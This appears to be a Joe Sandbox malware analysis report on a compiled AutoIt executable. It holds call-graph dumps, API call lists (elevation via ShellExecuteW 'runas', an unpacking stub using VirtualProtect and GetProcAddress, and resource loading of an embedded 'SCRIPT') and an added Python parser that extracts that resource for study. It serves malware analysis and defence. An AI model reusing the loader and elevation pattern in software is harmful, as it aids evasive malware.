105354 8b0dfd 105350->105354 105351->105340 105353 8b0e09 105352->105353 105355 8a8af4 __close 58 API calls 105353->105355 105356 8b0e33 __read RtlLeaveCriticalSection 105354->105356 105355->105354 105356->105340 105357->105273 105358->105284 105359->105276 105363 8a520a GetSystemTimeAsFileTime 105360->105363 105362 8e8f6e 105362->104956 105364 8a5238 __aulldiv 105363->105364 105364->105362 105366 8a5c6c __initptd 105365->105366 105367 8a5c7e 105366->105367 105368 8a5c93 105366->105368 105379 8a8b28 58 API calls __getptd_noexit 105367->105379 105369 8a6c11 __lock_file 59 API calls 105368->105369 105372 8a5c99 105369->105372 105371 8a5c83 105380 8a8db6 9 API calls __swprintf 105371->105380 105381 8a58d0 67 API calls 6 library calls 105372->105381 105375 8a5c8e __initptd 105375->104961 105376 8a5ca4 105382 8a5cc4 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 105376->105382 105378 8a5cb6 105378->105375 105379->105371 105380->105375 105381->105376 105382->105378 105383->104787 105384->104833 105385->104835 105421 8e9748 __tzset_nolock _wcscmp 105416->105421 105417 8e9210 105417->104867 105422 8a40fb 58 API calls __wsplitpath_helper 105417->105422 105418 884f0b 74 API calls 105418->105421 105419 8e9109 GetSystemTimeAsFileTime 105419->105421 105420 884ee5 85 API calls 105420->105421 105421->105417 105421->105418 105421->105419 105421->105420 105422->104869 105423->104877 105750 8e3c3e 105749->105750 105751 8e4475 FindFirstFileW 105749->105751 105750->104495 105751->105750 105752 8e448a FindClose 105751->105752 105752->105750 105754 88818f 105753->105754 105757 8881aa 105753->105757 105755 887e4f 59 API calls 105754->105755 105756 888197 CharUpperBuffW 105755->105756 105756->105757 105757->104503 105759 88f251 105758->105759 105760 88f272 105759->105760 105886 8e9e4a 89 API calls 4 library calls 105759->105886 105760->104555 105763 88838d 105762->105763 105764 8bedbd 105762->105764 105765 8a0db6 Mailbox 59 API calls 105763->105765 105766 888394 105765->105766 
105767 8883b5 105766->105767 105887 888634 59 API calls Mailbox 105766->105887 105767->104520 105767->104529 105770 8c4cc3 105769->105770 105784 8909f5 105769->105784 105928 8e9e4a 89 API calls 4 library calls 105770->105928 105772 890cfa 105772->104549 105774 890ee4 105774->105772 105776 890ef1 105774->105776 105926 891093 331 API calls Mailbox 105776->105926 105777 890a4b PeekMessageW 105839 890a05 Mailbox 105777->105839 105779 890ef8 LockWindowUpdate DestroyWindow GetMessageW 105779->105772 105782 890f2a 105779->105782 105781 8c4e81 Sleep 105781->105839 105785 8c5c58 TranslateMessage DispatchMessageW GetMessageW 105782->105785 105783 890ce4 105783->105772 105925 891070 10 API calls Mailbox 105783->105925 105784->105839 105929 889e5d 60 API calls 105784->105929 105930 8d6349 331 API calls 105784->105930 105785->105785 105787 8c5c88 105785->105787 105787->105772 105788 890e43 PeekMessageW 105788->105839 105789 890ea5 TranslateMessage DispatchMessageW 105789->105788 105790 8c4d50 TranslateAcceleratorW 105790->105788 105790->105839 105791 889e5d 60 API calls 105791->105839 105792 890d13 timeGetTime 105792->105839 105793 8c581f WaitForSingleObject 105796 8c583c GetExitCodeProcess CloseHandle 105793->105796 105793->105839 105795 8a0db6 59 API calls Mailbox 105795->105839 105830 890f95 105796->105830 105797 890e5f Sleep 105829 890e70 Mailbox 105797->105829 105798 888047 59 API calls 105798->105839 105799 887667 59 API calls 105799->105829 105800 8c5af8 Sleep 105800->105829 105802 8a049f timeGetTime 105802->105829 105804 890f4e timeGetTime 105927 889e5d 60 API calls 105804->105927 105807 8c5b8f GetExitCodeProcess 105811 8c5bbb CloseHandle 105807->105811 105812 8c5ba5 WaitForSingleObject 105807->105812 105808 889837 84 API calls 105808->105839 105809 905f25 110 API calls 105809->105829 105810 88b7dd 109 API calls 105810->105829 105811->105829 105812->105811 105812->105839 105815 8c5874 105815->105830 105816 8c5078 Sleep 105816->105839 105817 8c5c17 Sleep 105817->105839 
105819 887de1 59 API calls 105819->105829 105823 889ea0 304 API calls 105823->105839 105825 88f460 304 API calls 105825->105839 105826 88fce0 304 API calls 105826->105839 105829->105799 105829->105802 105829->105807 105829->105809 105829->105810 105829->105815 105829->105816 105829->105817 105829->105819 105829->105830 105829->105839 105936 8e2408 60 API calls 105829->105936 105937 889e5d 60 API calls 105829->105937 105938 8889b3 69 API calls Mailbox 105829->105938 105939 88b73c 331 API calls 105829->105939 105940 8d64da 60 API calls 105829->105940 105941 8e5244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105829->105941 105942 8e3c55 66 API calls Mailbox 105829->105942 105830->104549 105831 8e9e4a 89 API calls 105831->105839 105832 8884c0 69 API calls 105832->105839 105834 8889b3 69 API calls 105834->105839 105835 889c90 59 API calls Mailbox 105835->105839 105836 8882df 59 API calls 105836->105839 105837 8d617e 59 API calls Mailbox 105837->105839 105838 887de1 59 API calls 105838->105839 105839->105777 105839->105781 105839->105783 105839->105788 105839->105789 105839->105790 105839->105791 105839->105792 105839->105793 105839->105795 105839->105797 105839->105798 105839->105800 105839->105804 105839->105808 105839->105823 105839->105825 105839->105826 105839->105829 105839->105830 105839->105831 105839->105832 105839->105834 105839->105835 105839->105836 105839->105837 105839->105838 105840 8c55d5 VariantClear 105839->105840 105841 8d6e8f 59 API calls 105839->105841 105842 8c566b VariantClear 105839->105842 105843 888cd4 59 API calls Mailbox 105839->105843 105844 8c5419 VariantClear 105839->105844 105845 88b73c 304 API calls 105839->105845 105888 88e6a0 105839->105888 105919 8831ce 105839->105919 105924 88e420 331 API calls 105839->105924 105931 906018 59 API calls 105839->105931 105932 8e9a15 59 API calls Mailbox 105839->105932 105933 8dd4f2 59 API calls 105839->105933 105934 8d60ef 59 API calls 2 library calls 
105839->105934 105935 888401 59 API calls 105839->105935 105840->105839 105841->105839 105842->105839 105843->105839 105844->105839 105845->105839 105847 8beda1 105846->105847 105850 8882f2 105846->105850 105848 8bedb1 105847->105848 105951 8d61a4 59 API calls 105847->105951 105851 88831c 105850->105851 105852 8885c0 59 API calls 105850->105852 105856 888339 Mailbox 105850->105856 105853 888322 105851->105853 105854 8885c0 59 API calls 105851->105854 105852->105851 105855 889c90 Mailbox 59 API calls 105853->105855 105853->105856 105854->105853 105855->105856 105856->104579 105857->104573 105858->104573 105859->104504 105860->104515 105861->104512 105862->104515 105863->104515 105864->104516 105865->104530 105866->104525 105867->104525 105869 8885ce 105868->105869 105875 8885f6 105868->105875 105870 8885dc 105869->105870 105871 8885c0 59 API calls 105869->105871 105872 8885e2 105870->105872 105873 8885c0 59 API calls 105870->105873 105871->105870 105874 889c90 Mailbox 59 API calls 105872->105874 105872->105875 105873->105872 105874->105875 105875->104528 105876->104573 105877->104573 105878->104573 105880 8884cb 105879->105880 105882 8884f2 105880->105882 105952 8889b3 69 API calls Mailbox 105880->105952 105882->104557 105883->104515 105884->104558 105885->104515 105886->105760 105887->105767 105889 88e6d5 105888->105889 105890 8c3aa9 105889->105890 105892 88e73f 105889->105892 105903 88e799 105889->105903 105891 889ea0 331 API calls 105890->105891 105893 8c3abe 105891->105893 105896 887667 59 API calls 105892->105896 105892->105903 105914 88e970 Mailbox 105893->105914 105944 8e9e4a 89 API calls 4 library calls 105893->105944 105894 887667 59 API calls 105894->105903 105898 8c3b04 105896->105898 105897 8a2d40 __cinit 67 API calls 105897->105903 105900 8a2d40 __cinit 67 API calls 105898->105900 105899 8c3b26 105899->105839 105900->105903 105901 8e9e4a 89 API calls 105901->105914 105902 8884c0 69 API calls 105902->105914 105903->105894 105903->105897 105903->105899 

                                    Control-flow Graph

                                    APIs
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00883B68
                                    • IsDebuggerPresent.KERNEL32 ref: 00883B7A
                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,009452F8,009452E0,?,?), ref: 00883BEB
                                      • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
                                      • Part of subcall function 0089092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00883C14,009452F8,?,?,?), ref: 0089096E
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00883C6F
                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00937770,00000010), ref: 008BD281
                                    • SetCurrentDirectoryW.KERNEL32(?,009452F8,?,?,?), ref: 008BD2B9
                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00934260,009452F8,?,?,?), ref: 008BD33F
                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 008BD346
                                      • Part of subcall function 00883A46: GetSysColorBrush.USER32(0000000F), ref: 00883A50
                                      • Part of subcall function 00883A46: LoadCursorW.USER32(00000000,00007F00), ref: 00883A5F
                                      • Part of subcall function 00883A46: LoadIconW.USER32(00000063), ref: 00883A76
                                      • Part of subcall function 00883A46: LoadIconW.USER32(000000A4), ref: 00883A88
                                      • Part of subcall function 00883A46: LoadIconW.USER32(000000A2), ref: 00883A9A
                                      • Part of subcall function 00883A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00883AC0
                                      • Part of subcall function 00883A46: RegisterClassExW.USER32(?), ref: 00883B16
                                      • Part of subcall function 008839D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00883A03
                                      • Part of subcall function 008839D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00883A24
                                      • Part of subcall function 008839D5: ShowWindow.USER32(00000000,?,?), ref: 00883A38
                                      • Part of subcall function 008839D5: ShowWindow.USER32(00000000,?,?), ref: 00883A41
                                      • Part of subcall function 0088434A: _memset.LIBCMT ref: 00884370
                                      • Part of subcall function 0088434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00884415
                                    Strings
                                    • This is a third-party compiled AutoIt script., xrefs: 008BD279
                                    • runas, xrefs: 008BD33A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                    • API String ID: 529118366-3287110873
                                    • Opcode ID: 651f24e10fd483c6297cd3133587a4b4b17f44ad84583904f8da259dbb14910e
                                    • Instruction ID: 07679c57ec5430635ecad6606c2bd04e030f170048d1e818c1017d3dec4965ec
                                    • Opcode Fuzzy Hash: 651f24e10fd483c6297cd3133587a4b4b17f44ad84583904f8da259dbb14910e
                                    • Instruction Fuzzy Hash: 2351E575908248AFCB21FBF8DC15DED7B75FB46714F104066F421E2263EAA09605EB22

                                    Control-flow Graph

                                    APIs
                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 008836D2
                                    • KillTimer.USER32(?,00000001), ref: 008836FC
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0088371F
                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0088372A
                                    • CreatePopupMenu.USER32 ref: 0088373E
                                    • PostQuitMessage.USER32(00000000), ref: 0088374D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                    • String ID: TaskbarCreated
                                    • API String ID: 157504867-2362178303
                                    • Opcode ID: b1df4f778509dc0fe6f562e82ddfe4224e4257195c327eee53a22cd43856aff6
                                    • Instruction ID: f9fbe0330233192aaf98c6c84fcecf6dad1c230ed534df1c88066882acab63ff
                                    • Opcode Fuzzy Hash: b1df4f778509dc0fe6f562e82ddfe4224e4257195c327eee53a22cd43856aff6
                                    • Instruction Fuzzy Hash: 7941F8B2118609BBDF25BFACDC09F7D3794F711700F140535F502D62A2EA619E41B762

                                    Control-flow Graph

                                    APIs
                                    • GetVersionExW.KERNEL32(?), ref: 008849CD
                                      • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
                                    • GetCurrentProcess.KERNEL32(?,0090FAEC,00000000,00000000,?), ref: 00884A9A
                                    • IsWow64Process.KERNEL32(00000000), ref: 00884AA1
                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00884AE7
                                    • FreeLibrary.KERNEL32(00000000), ref: 00884AF2
                                    • GetSystemInfo.KERNEL32(00000000), ref: 00884B23
                                    • GetSystemInfo.KERNEL32(00000000), ref: 00884B2F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                    • String ID:
                                    • API String ID: 1986165174-0
                                    • Opcode ID: dfcd54cb090c9ff1043668a7625ef7009df7c54075aa4e1b17fd70d685164ccf
                                    • Instruction ID: 2e6ab7c09a63cca5b59af6e3e3c3a1300f27789f968c9f9b4e23203e67a7a342
                                    • Opcode Fuzzy Hash: dfcd54cb090c9ff1043668a7625ef7009df7c54075aa4e1b17fd70d685164ccf
                                    • Instruction Fuzzy Hash: A691C23298D7C5DEC735EB7884501AABFF5FF2A304B44496ED0D6D7B01D220A908D759

Control-flow Graph

(graph image not preserved) Function at 0x884e89, basic blocks 0x884e89-0x884ec6 and 0x8bd933-0x8bd98b: calls CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource.
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00884E99
                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00884D8E,?,?,00000000,00000000), ref: 00884EB0
                                    • LoadResource.KERNEL32(?,00000000,?,?,00884D8E,?,?,00000000,00000000,?,?,?,?,?,?,00884E2F), ref: 008BD937
                                    • SizeofResource.KERNEL32(?,00000000,?,?,00884D8E,?,?,00000000,00000000,?,?,?,?,?,?,00884E2F), ref: 008BD94C
                                    • LockResource.KERNEL32(00884D8E,?,?,00884D8E,?,?,00000000,00000000,?,?,?,?,?,?,00884E2F,00000000), ref: 008BD95F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                    • String ID: SCRIPT
                                    • API String ID: 3051347437-3967369404
                                    • Opcode ID: 2c309e30286741f2da280b40da954c0db7e02d62160dfa97c6acb6be6dde4c3a
                                    • Instruction ID: 84802aae051a2c0c92cca75176950666ec67435e41e385978aaf1b5a62c7941a
                                    • Opcode Fuzzy Hash: 2c309e30286741f2da280b40da954c0db7e02d62160dfa97c6acb6be6dde4c3a
                                    • Instruction Fuzzy Hash: 0B119E72250701BFD7209B65EC48F677BBAFBC5B21F104268F416C6650EB61E9009660
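The function above (0x884e89) calls FindResourceExW with resource type 0x0000000A (RT_RCDATA) and the name "SCRIPT", then LoadResource, SizeofResource and LockResource, and copies the bytes into a stream created with CreateStreamOnHGlobal. This is the AutoIt runtime fetching its compiled script from the executable's own resource section, which is the evidence behind the "compiled AutoIt script" verdict in the signature list. The Python below is an added example, not code from Joe Sandbox or from the AutoIt project: it walks the PE resource directory by hand (no third-party PE library) and returns the bytes of the RCDATA resource named SCRIPT, so the same check can be run statically over a sample before it is executed. The build_sample_pe helper constructs a minimal PE32 whose only section is .rsrc, used as test input; the payload it embeds is a placeholder, not a real compiled script.

```python
import struct

RT_RCDATA = 10          # resource type seen in the FindResourceExW call above (0x0000000A)
SUBDIR = 0x80000000     # high bit set: entry refers to a sub-directory / name string, not a data entry / ID


def _parse_headers(data):
    """Return (resource_dir_rva, [(va, vsize, raw_ptr, raw_size), ...]) from a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    n_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    # DataDirectory starts at +0x60 for PE32 (0x10B) and +0x70 for PE32+ (0x20B); entry 2 is the resource table
    dd = opt + (0x60 if magic == 0x10B else 0x70)
    rsrc_rva = struct.unpack_from("<I", data, dd + 2 * 8)[0]
    sections = []
    for i in range(n_sections):
        off = opt + opt_size + 40 * i            # IMAGE_SECTION_HEADER is 40 bytes; name occupies the first 8
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append((va, vsize, raw_ptr, raw_size))
    return rsrc_rva, sections


def _rva_to_offset(rva, sections):
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def _walk(data, base, dir_off, path, out):
    """Depth-first walk of an IMAGE_RESOURCE_DIRECTORY at base+dir_off; collects (path, rva, size)."""
    n_named, n_id = struct.unpack_from("<HH", data, base + dir_off + 12)
    for i in range(n_named + n_id):
        name, off = struct.unpack_from("<II", data, base + dir_off + 16 + 8 * i)
        if name & SUBDIR:                        # IMAGE_RESOURCE_DIR_STRING_U: WORD length, then UTF-16LE chars
            s = base + (name & 0x7FFFFFFF)
            n = struct.unpack_from("<H", data, s)[0]
            key = data[s + 2:s + 2 + 2 * n].decode("utf-16-le")
        else:
            key = name                           # numeric type, ID or language
        if off & SUBDIR:
            _walk(data, base, off & 0x7FFFFFFF, path + (key,), out)
        else:                                    # IMAGE_RESOURCE_DATA_ENTRY: OffsetToData (an RVA), Size, CodePage, Reserved
            rva, size = struct.unpack_from("<II", data, base + off)
            out.append((path + (key,), rva, size))


def list_resources(data):
    """Return [(path, file_offset, size)] where path is (type, name, language)."""
    rsrc_rva, sections = _parse_headers(data)
    if rsrc_rva == 0:
        return []
    base = _rva_to_offset(rsrc_rva, sections)
    found = []
    _walk(data, base, 0, (), found)
    return [(p, _rva_to_offset(rva, sections), size) for p, rva, size in found]


def find_autoit_script(data):
    """Return the bytes of the RCDATA resource named SCRIPT, or None if the file carries none."""
    for path, off, size in list_resources(data):
        if len(path) >= 2 and path[0] == RT_RCDATA and isinstance(path[1], str) and path[1].upper() == "SCRIPT":
            return data[off:off + size]
    return None


def build_sample_pe(payload, name="SCRIPT"):
    """Constructed test input: a minimal PE32 whose only section is .rsrc holding one RCDATA resource."""
    def directory(n_named, n_id):
        return struct.pack("<IIHHHH", 0, 0, 0, 0, n_named, n_id)

    string_blob = struct.pack("<H", len(name)) + name.encode("utf-16-le")
    payload_off = (0x58 + len(string_blob) + 3) & ~3                            # keep the data 4-byte aligned
    rsrc = bytearray()
    rsrc += directory(0, 1) + struct.pack("<II", RT_RCDATA, SUBDIR | 0x18)     # root: one type entry
    rsrc += directory(1, 0) + struct.pack("<II", SUBDIR | 0x58, SUBDIR | 0x30)  # type 10: one named entry
    rsrc += directory(0, 1) + struct.pack("<II", 0x409, 0x48)                   # name: one language entry
    rsrc += struct.pack("<IIII", 0x1000 + payload_off, len(payload), 0, 0)      # data entry at 0x48
    rsrc += string_blob                                                         # name string at 0x58
    rsrc += b"\0" * (payload_off - len(rsrc)) + payload
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)                        # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                                       # PE32 magic
    struct.pack_into("<II", opt, 0x60 + 2 * 8, 0x1000, len(rsrc))              # DataDirectory[2] = resource table
    sect = b".rsrc\0\0\0" + struct.pack("<IIII", len(rsrc), 0x1000, len(rsrc), 0x200) + b"\0" * 16
    return bytes((dos + coff + opt + sect).ljust(0x200, b"\0") + rsrc)


if __name__ == "__main__":
    sample = build_sample_pe(b"constructed stand-in for the compiled script")
    print(list_resources(sample))
    print(find_autoit_script(sample))
```

Against a real sample, `find_autoit_script(open(path, "rb").read())` returns the resource bytes that can be handed to an AutoIt decompiler, and None when the file has no SCRIPT RCDATA resource. The check only sees the outermost PE: a packer or loader that wraps the AutoIt executable hides the resource until the inner image is unpacked, so run it on the dumped memory image as well as on the file on disk.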

Control-flow Graph

(graph image not preserved) Function at 0x9d9a50, basic blocks 0x9d9a50-0x9d9c2a: calls LoadLibraryA, GetProcAddress, ExitProcess and VirtualProtect (two call sites).
                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 009D9B8A
                                    • GetProcAddress.KERNEL32(?,009D2FF9), ref: 009D9BA8
                                    • ExitProcess.KERNEL32(?,009D2FF9), ref: 009D9BB9
                                    • VirtualProtect.KERNELBASE(00880000,00001000,00000004,?,00000000), ref: 009D9C07
                                    • VirtualProtect.KERNELBASE(00880000,00001000), ref: 009D9C1C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                    • String ID:
                                    • API String ID: 1996367037-0
                                    • Opcode ID: 40b62bfaee3175b61773ca67ec831891edf92d249dbb3b1564182c3257822b3e
                                    • Instruction ID: 709eed7c50a6d323005f0947c3efd7959be86bcaa1930c0259eb7fed215c5dae
                                    • Opcode Fuzzy Hash: 40b62bfaee3175b61773ca67ec831891edf92d249dbb3b1564182c3257822b3e
                                    • Instruction Fuzzy Hash: 28511773AD43524BD720AEB8DCC0661B798EB52324B294B3BD5E2C73C5E7A85C05C760
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID:
                                    • API String ID: 3964851224-0
                                    • Opcode ID: 141d23d19d773fc81ee48aac4657f72dcf3044bcf8f113863f5ad12157918264
                                    • Instruction ID: c225d4ace963e5c797eb386d0f9c39a3be5b5172f161c42287e62f52a7ac5370
                                    • Opcode Fuzzy Hash: 141d23d19d773fc81ee48aac4657f72dcf3044bcf8f113863f5ad12157918264
                                    • Instruction Fuzzy Hash: 879238706083459FDB20EF18C490B2AB7E1FB85314F18896DE99ADB262D771EC45CF92
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?,008BE398), ref: 008E446A
                                    • FindFirstFileW.KERNELBASE(?,?), ref: 008E447B
                                    • FindClose.KERNEL32(00000000), ref: 008E448B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: FileFind$AttributesCloseFirst
                                    • String ID:
                                    • API String ID: 48322524-0
                                    • Opcode ID: 7f0693936b45c5a014bf4f305c02a90846bcc8e31da802d1481b0bc1fc4bc8e7
                                    • Instruction ID: 035c40c107375fe43d08f181b4be8b1ba8579a373854449777d0a4c152d8f48b
                                    • Opcode Fuzzy Hash: 7f0693936b45c5a014bf4f305c02a90846bcc8e31da802d1481b0bc1fc4bc8e7
                                    • Instruction Fuzzy Hash: 01E0D8335255456B8220AB38EC0D4E9779CEE06339F100715F939D14D0E7745A00A599
                                    Strings
                                    • Variable must be of type 'Object'., xrefs: 008C3E62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
